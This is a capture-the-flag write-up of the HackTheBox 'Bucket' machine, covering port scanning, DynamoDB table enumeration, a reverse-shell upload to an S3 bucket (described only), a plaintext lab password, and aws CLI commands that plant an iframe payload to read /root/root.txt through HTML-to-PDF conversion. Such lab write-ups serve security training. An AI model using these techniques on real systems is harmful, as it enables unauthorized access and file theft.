7.7 KiB
HackTheBox-Bucket
Rustscan
rustscan -a 10.10.10.212 -- -A -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.10.212:22
Open 10.10.10.212:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP
(Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
PORT 80
It's using a domain name so we are going to add that to /etc/hosts
Notice that we don't see images , the reason behind it is that it's retreiving the image from s3.bucket.htb
Running dirsearch against that
If we visit s3.bucket.htb/shell
But adding / makes a difference
s3.bucket.htb/shell/
Reading the documentation to list tables
var params = {
};
dynamodb.listTables(params, function(err, data) {
if (err) console.log(err, err.stack); // an error occurred
else console.log(data); // successful response
});
We have a found a table name users , to view the data from the table
var params = {
TableName:"users"};
docClient.scan(params, (error, result) => {
if (error) {
console.log('error', error);
} else {
console.log(result.Items); // x items
}
});
Tried using these credentials through ssh but failed
Also running wfuzz on http://s3.bucket.htb/shell/ didn't returned anything intersting
So after spending so much time I realized tha I could also list the tables using aws cli
We needed to setup the credentials and the region first also to note that our end point url will be http://s3.bucket.htb
We can view the tables from here as well
Honestly did not know what I was doing until I ran aws s3 ls again
Here we can see index.html , if we visit s3.bucket.htb/adserver/index.html, it will be the same as bucket.htb so this means if we upload a php reverse shell on the bucket which is adserver we can access that from bucket.htb
That reverse shell is uploaded also keep it my mind to access that quickly because s3 bucket is going to remove it
We can switch user to roy with the password n2vM-<_K_Q:.Aa2 also if we look for open ports we can find port 8000 is running as http so we can do port forwarding with chisel
On our machine
On target machine
We can also find bucket-app in /var/www
Looking at index.php it's using dynamodb client to iterate contents of alerts table and then reading it and storing it to a pdf using pd4ml which converts html and css to pdf
So we need to create a table first
aws dynamodb create-table \
--table-name alerts \
--attribute-definitions \
AttributeName=title,AttributeType=S \
AttributeName=data,AttributeType=S \
--key-schema \
AttributeName=title,KeyType=HASH \
AttributeName=data,KeyType=RANGE \
--provisioned-throughput \
ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url 'http://s3.bucket.htb'
Now we need to insert the data
aws dynamodb put-item \
--table-name alerts \
--item '{
"title": {"S": "Ransomware"},
"data": {"S": "<html><head></head><body><iframe src='/root/root.txt'></iframe></body></html>"}
}' \
--return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htb
Now doing a POST request with action=get_alerts
curl --data "action=get_alerts" -X POST http://127.0.0.1:8000
Note : The converted pdf file will get removed also the table so you need to be quick here to get the file
I started a python http server
And we got the root flag , although I was able to get the private ssh key but couldn't make it in a proper format so I just left having a root hash